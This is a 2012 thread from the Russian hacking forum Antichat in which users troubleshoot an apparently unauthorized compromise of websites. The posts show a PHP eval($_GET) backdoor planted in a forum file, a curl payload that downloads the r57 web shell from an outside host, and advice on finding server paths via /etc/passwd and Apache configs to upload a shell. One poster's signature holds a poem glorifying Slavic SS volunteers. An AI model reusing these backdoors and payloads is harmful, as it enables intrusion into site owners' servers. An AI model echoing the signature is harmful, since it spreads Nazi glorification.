ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.03.2012, 23:49
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
минишелл добавил, попробывал загрузить файл, ошибок никаких не выдало, но при переходе на адрес шела-редиректит на главную страничку форума
Сообщение от HAXTA4OK
HAXTA4OK said:
какую переменную ты добавил, как выглядит вообще твой код?
eval($_GET[e]); |
|
|
04.03.2012, 23:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Cherep
Cherep said:
минишелл добавил, попробывал загрузить файл, ошибок никаких не выдало, но при переходе на адрес шела-редиректит на главную страничку форума
eval($_GET[e]);
набудующее от кавычек stripslashes ,eval(stripslashes($_GET[e]))
а в твое случае попробуй имятвоего_скрипта.php?e=eval(strip slashes($_GET[a]))&a=ну и тут твой код с кавычками
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
04.03.2012, 23:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от Zahar
Zahar said:
посмотрел access log но запрос попросту принял вид
Код HTML:
HTML:
%3C?php%20phpinfo();%20?%3E
для эксплуатации непригоден.
Камрады есть еще варианты, потому как у меня попросту уже исчерпался запас. Перекодирует браузер, нужно использовать тулзу, которая отправляет сырой запрос,
в простейшем случае - telnet, много инструментов более удобных. Не трудно отправить курлом.
На форуме была программа.
|
|
|
|
05.03.2012, 00:02
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Сообщение от HAXTA4OK
HAXTA4OK said:
набудующее от кавычек stripslashes ,eval(stripslashes($_GET[e]))
а в твое случае попробуй имятвоего_скрипта.php?e=eval(strip slashes($_GET[a]))&a=ну и тут твой код с кавычками
собственно записал в фак комплит
eval(stripslashes($_GET[e]));
но чето всёравно не получается(
вот какой код использую
Код:
Code:
e=system('curl http://www.sh3ll.org/r57.txt > 23.php');
|
|
|
|
05.03.2012, 00:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Cherep
Cherep said:
собственно записал в фак комплит
eval(stripslashes($_GET[e]))
но чето всёравно не получается(
вот какой код использую
Код:
Code:
e=system('curl http://www.sh3ll.org/r57.txt > 23.php');
напиши в пм домен....уверен что папка на запись досутпна?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
05.03.2012, 00:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Пару вопросов,
сижу в phpmyadmin с правами рут
где в настройках изменить max_allowed_packet
и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя
bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\
каким будет полный путь к файлам исходя из етого?
|
|
|
|
05.03.2012, 00:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
Пару вопросов,
сижу в phpmyadmin с правами рут
где в настройках изменить max_allowed_packet
и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя
bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\
каким будет полный путь к файлам исходя из етого?
"max_allowed_packet" менять надо в my.ini
второй вопрос не правильно составил, что это за юзер? и что означает полный путь к файлам? и к каким файлам?
|
|
|
|
05.03.2012, 00:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Konqi
Konqi said:
"max_allowed_packet" менять надо в
my.ini
второй вопрос не правильно составил, что это за юзер? и что означает полный путь к файлам? и к каким файлам?
полный путь к файлам на хостинге, чтобы шелл залить
|
|
|
|
05.03.2012, 00:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от qaz
qaz said:
Пару вопросов,
сижу в phpmyadmin с правами рут
где в настройках изменить max_allowed_packet
и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя
bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\
каким будет полный путь к файлам исходя из етого?
если я тебя правильно понял то ищи конфиг http.conf там тебе и будет путь
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
05.03.2012, 01:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от HAXTA4OK
HAXTA4OK said:
если я тебя правильно понял то ищи конфиг http.conf там тебе и будет путь
чёт не могу конфинг откопать
всё что перепробовал
Сообщение от None
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
как ещо бывает?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
